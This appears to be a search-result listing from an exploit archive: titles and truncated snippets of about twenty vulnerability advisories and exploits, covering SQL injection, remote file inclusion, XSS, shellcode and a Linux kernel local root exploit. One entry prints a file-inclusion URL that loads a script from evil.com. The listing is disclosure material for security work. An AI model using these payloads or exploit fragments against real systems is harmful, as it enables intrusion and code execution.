1622 matches found
Novell Netware Web Server 3.x files.pl Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2076/info Novell Web Server 3.x Examples Toolkit v.2 is a package containing example scripts and HTML files to help administrators design web sites. It is not a support Novell product and is provided solely as a convenien...
Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/39867/info Billwerx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit
No description provided by source. / Author: h00lyshit Vulnerable: Linux 2.6 ALL Type of Vulnerability: Local Race Tested On : various distros Vendor Status: unknown Disclaimer: In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or sprea...
SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable Arbitrary Site Redirect
No description provided by source. source: http://www.securityfocus.com/bid/16671/info SAP Business Connector is susceptible to an input-validation vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. This issue allows remote attackers to execute...
agXchange ESM 'ucschcancelproc.jsp' Open Redirection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38879/info agXchange ESM is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible...
Nero Express 7.9.6.4 - Local Heap PoC
No description provided by source. !/user/bin/perl Exploit Title: Nero Express7 Local Heap Poc Date: 2010/01/01 Author: D3V!L FUCKER Version: Nero Express7 Ver.7.9.6.4 Tested on: windows vista sp0 After Setup Open Nero StartSmart Essentials = Favorites = Open Projects = explit.nir Code : $headr=...
QuiXplorer 2.3 - Bugtraq File Upload Vulnerability
No description provided by source. Exploit Title: QuiXplorer 2.3 = Bugtraq File Upload Vulnerability Google Dork: QuiXplorer 2.3 - the QuiX project Date: 13/11/2011 Author: PCA & krhrkrhr and Software Link: http://quixplorer.sourceforge.net/ Version: QuiXplorer 2.3 Tested on: linux ,windows CVE :...
SG Real Estate Portal 2.0 - Blind SQL Injection Exploit
No description provided by source. ?php inisetmaxexecutiontime,0; printr' SG Real Estate Portal 2.0 - Blind SQL Injection Exploit Vulnerability discovered by: Stack Exploit coded by: Stack Greetz to: All My Freind Admin Panel: Target/SG/ Usage: php '.$argv0.' Target Userid Example : php '.$argv0....
Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute code in the context of the webserver. This issue affects Campsite 2.6.1. Earlier...
Pixel8 Web Photo Album 3.0 - Remote SQL Injection Vulnerability
No description provided by source. -------------------------------AlpHaNiX---------------------------------- Found By : AlpHaNiX website : www.nullarea.net contact : AlpHaATHACKERDOTBZ script : Pixel8 Web Photo Album v3.0 download : null Demo : http://www.jayeshp.com/Pixel8/Files/Demo.asp Exploit...
Linux/x86 Remote Port Forwarding Shellcode 87 bytes
No description provided by source. / Linux/x86 Remote Port forwarding 87 bytes ssh -R 9999:localhost:22 192.168.0.226 Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom / xor %eax,%eax push %eax pushl $0x3632322e pushl $0x30302e38 push...
Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
SaralBlog 1.0 - Multiple Input Validation Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/16306/info saralblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. Successful exploitation of these vulnerabilities...
Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit
No description provided by source. ?php inisetmaxexecutiontime,0; printr' Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit Vulnerability discovered by: Stack Exploit coded by: Stack Greetz to: All My Freind Dork: intext:Powered by Atomic Photo Album 1.1.0pre4 Admin Panel: Target/apa/...
Solaris/x86 - Remote Download file - 79 bytes
No description provided by source. / Title: Solaris/x86 - Remote Download file - 79 bytes Author: Jonathan Salwan submit ! shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes http://www.shell-storm.org/shellcode/ Date: 2010-05-25...
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
No description provided by source. Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...
Ultimate Auction 3.67 ItemList.PL Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16254/info Ultimate Auction is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitra...
Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
No description provided by source. source: http://www.securityfocus.com/bid/4877/info Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation. When Apache Tomcat is installed with a default configuration, several example files are also installed. When some ...
OSSIM 2.1 - SQL Injection and xss
No description provided by source. OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3. Unauthorized access Digital Security Research Group DSecRG Advisory DSECRG-09-055 Application: OSSIM Versions Affected: 2.1...
Kartli Alisveris Sistemi 1.0 - Remote SQL Injection Vulnerability
No description provided by source. Discovered by: kerem125 & gsy Website: http://www.kerem125.com/ & http://www.by-gsy.org/ Script download: http://download.asprehberi.net/dosyalar/kategoriler/alisveris/freepaypalshoppingcarttr.zip Exploit:...